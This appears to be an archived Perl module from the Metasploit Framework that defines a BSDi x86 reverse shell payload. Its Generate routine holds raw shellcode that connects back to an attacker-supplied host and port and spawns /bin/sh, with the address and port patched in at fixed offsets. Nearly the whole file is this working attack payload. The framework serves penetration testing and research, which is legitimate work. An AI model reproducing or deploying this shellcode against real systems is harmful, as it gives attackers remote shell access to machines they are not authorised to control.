home *** CD-ROM | disk | FTP | other *** search
-
- ##
- # This file is part of the Metasploit Framework and may be redistributed
- # according to the licenses defined in the Authors field below. In the
- # case of an unknown or missing license, this file defaults to the same
- # license as the core Framework (dual GPLv2 and Artistic). The latest
- # version of the Framework can always be obtained from metasploit.com.
- ##
-
- package Msf::Payload::bsdi_ia32_reverse;
-
- use strict;
- use base 'Msf::PayloadComponent::ReverseConnection';
-
- my $info =
- {
- 'Name' => 'BSDi IA32 Reverse Shell',
- 'Version' => '$Revision: 1.2 $',
- 'Description' => 'Connect back to attacker and spawn a shell',
- 'Authors' => [ 'skape <mmiller [at] hick.org>',
- 'optyx <optyx [at] uberhax0r.net>' ],
- 'Arch' => [ 'x86' ],
- 'Priv' => 0,
- 'OS' => [ 'bsdi' ],
- 'Size' => '',
- };
-
- sub new
- {
- my $class = shift;
- my $hash = @_ ? shift : { };
-
- $hash = $class->MergeHashRec($hash, {'Info' => $info});
-
- my $self = $class->SUPER::new($hash, @_);
-
- $self->_Info->{'Size'} = $self->_GenSize;
-
- return $self;
- }
-
- sub Build
- {
- my $self = shift;
-
- return $self->Generate($self->GetVar('LHOST'),
- $self->GetVar('LPORT'));
- }
-
- sub Generate
- {
- my $self = shift;
- my $host = shift;
- my $port = shift;
- my $host_bin = gethostbyname($host);
- my $port_bin = pack('n', $port);
- my $off_host = 0x1c;
- my $off_port = 0x23;
-
- my $shellcode =
- "\x89\xe5\x68\x00\x07\x00\xc3\xb8\x9a\x00\x00\x00\x99\x50\x89\xe6" .
- "\x52\x42\x52\x42\x52\x6a\x61\x58\xff\xd6\x97\x68\x7f\x00\x00\x01" .
- "\x68\x10\x02\xbf\xbf\x89\xe3\x6a\x10\x53\x57\x6a\x62\x58\xff\xd6" .
- "\xb0\x5a\x52\x57\xff\xd6\x4a\x79\xf7\x50\x68\x2f\x2f\x73\x68\x68" .
- "\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\xff\xd6";
-
- substr($shellcode, $off_host, 4, $host_bin);
- substr($shellcode, $off_port, 2, $port_bin);
-
- return $shellcode;
- }
-
- sub _GenSize
- {
- my $self = shift;
-
- return length($self->Generate('127.0.0.1', 4444));
- }
-
- 1;
-